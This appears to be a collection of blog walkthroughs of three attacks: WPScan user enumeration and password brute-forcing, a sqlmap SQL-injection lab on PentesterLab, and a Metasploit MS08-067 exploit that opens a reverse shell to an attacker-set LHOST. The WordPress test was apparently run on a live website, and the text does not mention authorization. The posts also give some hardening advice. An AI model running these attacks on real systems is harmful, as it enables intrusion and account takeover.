WPSCAN - A WordPress Scanner

WordPress is one of the most famous CMS in the world. Just because it is popular does not mean it has the best security, in fact, like other popular accounts (Facebook, Instagram), WordPress becomes one of the main target for many hackers. One of the tools in Kali to exploit WordPress is wpscan. Through wpscan we can get the username of the WordPress account. Once the username is gained, we can brute force for password dictionary attack using the wpscan too. Using weak password combination will prone to this kind of attack which in the end you will find out that your account has been possessed by someone.

To test for user enumeration here is the command:

Wpscan –url url_of_target –enumerate u

Just wait a moment until there is a user login table:

Once login name is on the book, the next thing we want to do is to get the password. Wpscan has built-in tool for password brute force attack. But remember brute force attack will depend on the word list that you used. If the user use strong password and uncommon combination, it will be hard to get the password but sometimes people may not really aware of the password that they use is a common password. So, brute force attack is worth to try.

That command is used to  run the brute force attack. –wordlist followed by the wordlist file that you use. The brute force run as soon as you input the command.

After the brute force ends, it will show you the table with the password and username login. But this time I will stop until this because it may took a long time. There may be many password crackers or brute force tools with better speed or method, but for this one, using wpscan is an easy method to test it.

Now you may wonder, if wpscan exists, then how our WordPress accounts will be saved from this kind of attack? There some methods to prevent user enumeration. One of the simple method is use Stop User Enumeration plugin. The plugin can be found here. When I tried to a secure-tested WordPress website, here is the result that I got. 

In conclusion, there is nothing that is safe on the internet. WordPress becomes high priority target because many sites are built using it and many users may not know about security measure.

Notes: 

Yellow blocks on image is to block website information since the target is a live website.

Pentester Lab SQL Injection Exercise

Pentesterlab.com is one of the online course provider for Penetration testing. One of its exercise ask you to test for a SQL injection on one of the vulnerable application. Before you started, you need an ISO file of the vulnerable application. You can download the ISO image here.

Now lets try the exercise.

Notes:

• Attacker IP: 192.1668.0.103

• Target IP: 192.168.0.102, midway change to 192.168.0.105

First run sqlmap on Kali along with the banner scanner. The banner will tell the version of MySQL running on the targeted application. Use the command on the following image.

The sqlmap will do some operations needed to detect the version

Next, the version of the MySQL will be revealed along with the version of the web server. The version of the MySQL was revealed to be the 5.1.63 version which is still has the vulnerabilities of SQL injection. Once we know that it is still vulnerable, I tried to get more information regarding the database.

The following command is used to get the database available inside the target.

The available databases will be retrieved. Now we know that there are two available databases, information_schema and photoblog. Since the name of the web application is photoblog, I’m pretty sure that the database that contains the information of the web application is the photoblog db. The next step is to get the available tables inside the photoblog database.

The following command is used to get the tables of the photoblog database. –tables is used to get the list of the tables. Notes that this time the IP is changed, but it will not affect the result of the command.

The available tables will be shown once the command execution is finished. Now we see that there are three available tables on the photoblog database. There are categories, pictures, and users. Based on the common knowledge, the categories will contain the photo categories, while pictures will be the list of the photo/images on the photoblog sites. The last tables which is users must be contains the information of registered users along with the admin. The next step is to look on the available columns on the users table.

Use to following command to get the columns of the users table.

This resulted in the columns id, login, and password. The next step is to dump all the contents of the users table.

The –dump command will generate the table of the users table.

This is the users table, along with the content of it Now we know that the username for the login is called admin and the password is P4ssw0rd. The next step is to test the login using admin as the login username and P4ssw0rd

Now go to the login screen of the web application.

There you go. Now you has an access as the admin who can upload the image.

Now you know how dangerous if you exposing the parameter on the URL. Therefore in designing web application, you need to carefully measure what the user need to see. Moreover, avoid constructing SQL queries with user input. Using a framework when creating a php based web application is also important since this framework usually provide the means to query that is free from SQL injection vulnerability. Codeigniter for example, use Active Record for accessing the query.

References:

• http://www.esecurityplanet.com/hackers/how-to-prevent-sql-injection-attacks.html

• https://pentesterlab.com/exercises/from_sqli_to_shell

MS08_067 Vulnerability Demo with Metasploit

A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved. For this example, I will try to make reverse shell connection. The schema is represented by the image below:

To make this kind of schema, I will use the ms08_067_netapi vulnerability. Ms08 means Microsoft 2008, the year of the patch that make this vulnerability. 067 means the patch number of that year (67th). The vulnerability is explain here.

First, I set the exploit by using the command use windows/smb/ms08_067_netapi. Next I had to set the target host on RHOST. Just type set RHOST 131.107.1.222 to set the target IP address.

Next, run show options to see the this that has been setup.The RHOST now point to 131.107.1.222 and the RPORT pointed to an open port of the target.

The next step is to set the payload. Payload is the set  of codes that is used to execute the exploit. This time to make a reverse shell, the payload that need to be set is the windows/shell/reverse_tcp. In reverse shell, we need to set the listening host (LHOST) because the target needs to listen to this host. Set LHOST with the set LHOST 131.107.1.101. To see the LHOST again execute show options.

This time, options command show the info of the LHOST. The LHOST will listen on port 4444. The last command is to run the exploit by typing exploit.

 

There you go, I have an access to the shell target.

Reference:

• https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi

• http://resources.infosecinstitute.com/icmp-reverse-shell/